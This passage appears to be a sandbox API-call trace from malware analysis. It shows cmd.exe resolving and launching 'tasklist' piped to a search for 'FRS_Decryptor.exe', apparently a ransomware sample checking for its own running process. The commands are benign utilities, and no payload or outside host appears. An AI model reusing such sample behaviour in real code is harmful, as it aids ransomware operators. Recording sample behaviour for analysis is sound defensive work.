_wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0119.687] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0119.687] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0119.687] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0119.687] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0119.687] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0119.687] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0119.687] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0119.687] _wcsicmp (_String1="tasklist", _String2="FOR") returned 14 [0119.687] _wcsicmp (_String1="tasklist", _String2="IF") returned 11 [0119.687] _wcsicmp (_String1="tasklist", _String2="REM") returned 2 [0119.688] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0119.688] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0119.688] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0119.688] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0119.688] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0119.688] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0119.688] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0119.688] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0119.688] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0119.688] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0119.688] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0119.688] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0119.688] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0119.688] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0119.688] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0119.688] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0119.688] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0119.688] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0119.688] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0119.688] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0119.688] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0119.688] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0119.688] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0119.688] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0119.688] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0119.688] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0119.688] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0119.688] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0119.688] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0119.688] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0119.688] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0119.688] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0119.689] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0119.689] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0119.689] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0119.689] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0119.689] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0119.689] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0119.689] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0119.689] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0119.689] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0119.689] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0119.689] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0119.689] SetErrorMode (uMode=0x0) returned 0x0 [0119.689] SetErrorMode (uMode=0x1) returned 0x0 [0119.689] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x755228, lpFilePart=0x5df694 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x5df694*="Desktop") returned 0x1c [0119.689] SetErrorMode (uMode=0x0) returned 0x1 [0119.689] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0119.689] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0119.694] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0119.695] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0119.695] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x5df420, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5df420) returned 0xffffffff [0119.695] GetLastError () returned 0x2 [0119.695] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0119.696] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x5df420, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5df420) returned 0x755530 [0119.696] FindClose (in: hFindFile=0x755530 | out: hFindFile=0x755530) returned 1 [0119.696] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0x5df420, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5df420) returned 0xffffffff [0119.696] GetLastError () returned 0x2 [0119.696] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0x5df420, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5df420) returned 0x755530 [0119.696] FindClose (in: hFindFile=0x755530 | out: hFindFile=0x755530) returned 1 [0119.696] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0119.696] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0119.696] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0119.696] SetErrorMode (uMode=0x0) returned 0x0 [0119.697] SetErrorMode (uMode=0x1) returned 0x0 [0119.697] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x75a3c0, lpFilePart=0x5df43c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x5df43c*="Desktop") returned 0x1c [0119.697] SetErrorMode (uMode=0x0) returned 0x1 [0119.697] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0119.697] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0119.697] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0119.697] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0119.697] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x5df1c8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5df1c8) returned 0xffffffff [0119.697] GetLastError () returned 0x2 [0119.697] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0119.697] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x5df1c8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5df1c8) returned 0x755628 [0119.697] FindClose (in: hFindFile=0x755628 | out: hFindFile=0x755628) returned 1 [0119.698] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0x5df1c8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5df1c8) returned 0xffffffff [0119.698] GetLastError () returned 0x2 [0119.698] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0x5df1c8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5df1c8) returned 0x755628 [0119.698] FindClose (in: hFindFile=0x755628 | out: hFindFile=0x755628) returned 1 [0119.698] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0119.698] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0119.698] GetConsoleTitleW (in: lpConsoleTitle=0x5df6c4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0119.698] InitializeProcThreadAttributeList (in: lpAttributeList=0x5df5f0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x5df5d4 | out: lpAttributeList=0x5df5f0, lpSize=0x5df5d4) returned 1 [0119.698] UpdateProcThreadAttribute (in: lpAttributeList=0x5df5f0, dwFlags=0x0, Attribute=0x60001, lpValue=0x5df5dc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x5df5f0, lpPreviousValue=0x0) returned 1 [0119.698] GetStartupInfoW (in: lpStartupInfo=0x5df628 | out: lpStartupInfo=0x5df628*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x158, hStdError=0x2c)) [0119.698] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0119.698] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0119.699] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0119.699] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0119.699] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0119.699] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0119.699] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0119.699] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0119.699] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0119.699] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0119.699] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0119.699] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0119.699] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0119.699] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0119.699] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0119.699] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0119.699] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0119.699] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0119.699] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0119.699] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0119.699] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0119.699] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0119.699] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0119.699] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0119.699] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0119.699] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0119.699] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0119.699] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0119.699] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0119.699] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0119.699] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0119.699] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0119.699] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0119.699] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0119.699] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0119.699] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0119.699] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0119.699] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0119.699] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0119.699] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0119.699] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0119.700] lstrcmpW (lpString1="\\tasklist.exe", lpString2="\\XCOPY.EXE") returned -1 [0119.701] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\tasklist.exe", lpCommandLine="tasklist", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0x5df578*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tasklist", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x5df5c4 | out: lpCommandLine="tasklist", lpProcessInformation=0x5df5c4*(hProcess=0x64, hThread=0x60, dwProcessId=0xbd4, dwThreadId=0xb3c)) returned 1 [0119.705] CloseHandle (hObject=0x60) returned 1 [0119.705] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0119.705] GetEnvironmentStringsW () returned 0x7542d8* [0119.705] FreeEnvironmentStringsA (penv="=") returned 1 [0119.705] DeleteProcThreadAttributeList (in: lpAttributeList=0x5df5f0 | out: lpAttributeList=0x5df5f0) [0119.705] _get_osfhandle (_FileHandle=3) returned 0x54 [0119.705] DuplicateHandle (in: hSourceProcessHandle=0x64, hSourceHandle=0x54, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1 [0119.705] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0 [0119.705] _close (_FileHandle=5) returned 0 [0119.705] _dup (_FileHandle=0) returned 4 [0119.705] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0 [0119.705] _close (_FileHandle=3) returned 0 [0119.706] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0119.706] SetErrorMode (uMode=0x0) returned 0x0 [0119.706] SetErrorMode (uMode=0x1) returned 0x0 [0119.706] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x7542e0, lpFilePart=0x5df694 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x5df694*="Desktop") returned 0x1c [0119.706] SetErrorMode (uMode=0x0) returned 0x1 [0119.706] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0119.706] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0119.706] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0119.706] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0119.706] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0x5df420, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5df420) returned 0xffffffff [0119.706] GetLastError () returned 0x2 [0119.706] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0119.706] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0x5df420, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5df420) returned 0x755628 [0119.707] FindClose (in: hFindFile=0x755628 | out: hFindFile=0x755628) returned 1 [0119.707] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0x5df420, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5df420) returned 0xffffffff [0119.707] GetLastError () returned 0x2 [0119.707] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0x5df420, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5df420) returned 0x755628 [0119.707] FindClose (in: hFindFile=0x755628 | out: hFindFile=0x755628) returned 1 [0119.707] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0119.707] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0119.707] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0119.707] SetErrorMode (uMode=0x0) returned 0x0 [0119.707] SetErrorMode (uMode=0x1) returned 0x0 [0119.707] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x754668, lpFilePart=0x5df43c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x5df43c*="Desktop") returned 0x1c [0119.707] SetErrorMode (uMode=0x0) returned 0x1 [0119.707] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0119.707] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0119.708] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0119.708] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0119.708] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0x5df1c8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5df1c8) returned 0xffffffff [0119.708] GetLastError () returned 0x2 [0119.708] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0119.708] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0x5df1c8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5df1c8) returned 0x7504a0 [0119.708] FindClose (in: hFindFile=0x7504a0 | out: hFindFile=0x7504a0) returned 1 [0119.708] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0x5df1c8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5df1c8) returned 0xffffffff [0119.709] GetLastError () returned 0x2 [0119.709] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0x5df1c8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5df1c8) returned 0x7504a0 [0119.709] FindClose (in: hFindFile=0x7504a0 | out: hFindFile=0x7504a0) returned 1 [0119.709] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0119.709] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0119.709] GetConsoleTitleW (in: lpConsoleTitle=0x5df6c4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0119.709] InitializeProcThreadAttributeList (in: lpAttributeList=0x5df5f0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x5df5d4 | out: lpAttributeList=0x5df5f0, lpSize=0x5df5d4) returned 1 [0119.709] UpdateProcThreadAttribute (in: lpAttributeList=0x5df5f0, dwFlags=0x0, Attribute=0x60001, lpValue=0x5df5dc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x5df5f0, lpPreviousValue=0x0) returned 1 [0119.709] GetStartupInfoW (in: lpStartupInfo=0x5df628 | out: lpStartupInfo=0x5df628*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x158, hStdError=0x2c)) [0119.709] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0119.709] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0119.709] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0119.709] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0119.709] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0119.709] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0119.709] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0119.710] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0119.710] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0119.710] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0119.710] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0119.710] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0119.710] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0119.710] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0119.710] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0119.710] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0119.710] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0119.710] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0119.710] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0119.710] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0119.710] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0119.710] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0119.710] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0119.710] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0119.710] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0119.710] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0119.710] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0119.710] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0119.710] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0119.710] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0119.710] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0119.710] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0119.710] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0119.710] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0119.710] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0119.710] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0119.710] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0119.710] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0119.710] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0119.710] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0119.710] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0119.710] lstrcmpW (lpString1="\\find.exe", lpString2="\\XCOPY.EXE") returned -1 [0119.710] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\find.exe", lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0x5df578*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="find /i \"FRS_Decryptor.exe\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x5df5c4 | out: lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessInformation=0x5df5c4*(hProcess=0x60, hThread=0x54, dwProcessId=0xb40, dwThreadId=0x974)) returned 1 [0119.714] CloseHandle (hObject=0x54) returned 1 [0119.714] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0119.714] GetEnvironmentStringsW () returned 0x75ad78* [0119.714] FreeEnvironmentStringsA (penv="=") returned 1 [0119.714] DeleteProcThreadAttributeList (in: lpAttributeList=0x5df5f0 | out: lpAttributeList=0x5df5f0) [0119.714] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0 [0119.714] _close (_FileHandle=4) returned 0 [0119.714] WaitForSingleObject (hHandle=0x64, dwMilliseconds=0xffffffff) returned 0x0 [0120.184] GetExitCodeProcess (in: hProcess=0x64, lpExitCode=0x5df938 | out: lpExitCode=0x5df938*=0x0) returned 1 [0120.184] CloseHandle (hObject=0x64) returned 1 [0120.184] WaitForSingleObject (hHandle=0x60, dwMilliseconds=0xffffffff) returned 0x0 [0120.186] 